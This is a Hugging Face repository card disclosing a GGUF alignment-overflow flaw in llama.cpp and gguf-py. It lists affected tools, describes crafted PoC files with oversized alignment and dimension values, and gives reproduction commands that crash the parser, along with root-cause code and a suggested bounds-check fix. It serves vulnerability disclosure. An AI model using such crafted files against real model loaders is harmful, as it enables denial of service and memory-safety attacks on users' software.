Hugging Face's logo

k4wwak
/
gguf-alignment-overflow-poc

GGUF
security
vulnerability
poc
llama-cpp
huntr-bounty
Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

GGUF Alignment Overflow PoC — CVE Pending

⚠️ SECURITY VULNERABILITY PROOF OF CONCEPT ⚠️

This repository contains proof-of-concept files demonstrating an input validation vulnerability in the GGUF file format parser used by llama.cpp (C++) and gguf-py (Python).

Vulnerability Summary

The general.alignment KV pair in GGUF files accepts arbitrarily large power-of-2 values with no upper bound check, leading to:

  • C++ (64-bit): GGML_ASSERT failure → SIGABRTDenial of Service
  • C++ (32-bit): GGML_PAD integer overflow → arbitrary file seek → OOB Read
  • Python: alignment=2147483648 accepted silently → memory corruption risk

Affected Software

  • llama.cpp (all versions using GGUF format)
  • Ollama (bundled llama.cpp)
  • LM Studio (bundled llama.cpp)
  • llamafile (bundled llama.cpp)
  • koboldcpp (bundled llama.cpp)
  • text-generation-webui (uses llama.cpp backend)
  • gguf-py (Python reference implementation)

Files

File Description
poc_gguf_alignment_overflow.gguf Main PoC — alignment=0x80000000, causes SIGABRT crash
poc_alignment_max.gguf Minimal PoC — alignment=0x80000000, no tensors
poc_gguf_python_ndims_oom.gguf Python-only PoC — n_dims=0xFFFFFFFF, OOM crash

Reproduction

C++ (Crash — DoS)

git clone https://github.com/ggerganov/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build
./build/bin/llama-gguf poc_gguf_alignment_overflow.gguf r
# Result: SIGABRT (exit 134)

Python (Silent acceptance)

from gguf.gguf_reader import GGUFReader
reader = GGUFReader('poc_gguf_alignment_overflow.gguf')
print(f'alignment={reader.alignment}')  # 2147483648 — NO ERROR!

Root Cause 

// ggml/src/gguf.cpp line 612-614
// Only checks: alignment != 0 AND isPowerOf2(alignment)
// MISSING: alignment <= MAX_ALIGNMENT (upper bound)
if (ctx->alignment == 0 || (ctx->alignment & (ctx->alignment - 1)) != 0) {
    GGML_LOG_ERROR("%s: alignment %zu is not a power of 2\n", ...);
    gguf_free(ctx);
    return nullptr;
}

Suggested Fix 

// Add upper bound check
if (ctx->alignment == 0 || (ctx->alignment & (ctx->alignment - 1)) != 0 || ctx->alignment > 1048576) {
    GGML_LOG_ERROR("%s: alignment %zu is not a valid power of 2 (max 1048576)\n", ...);
    gguf_free(ctx);
    return nullptr;
}

Credit

Discovered by security researcher. Submitted via Huntr bounty program.

Downloads last month
12
GGUF
Model size
0 params
Architecture
llama
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

View all variants
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support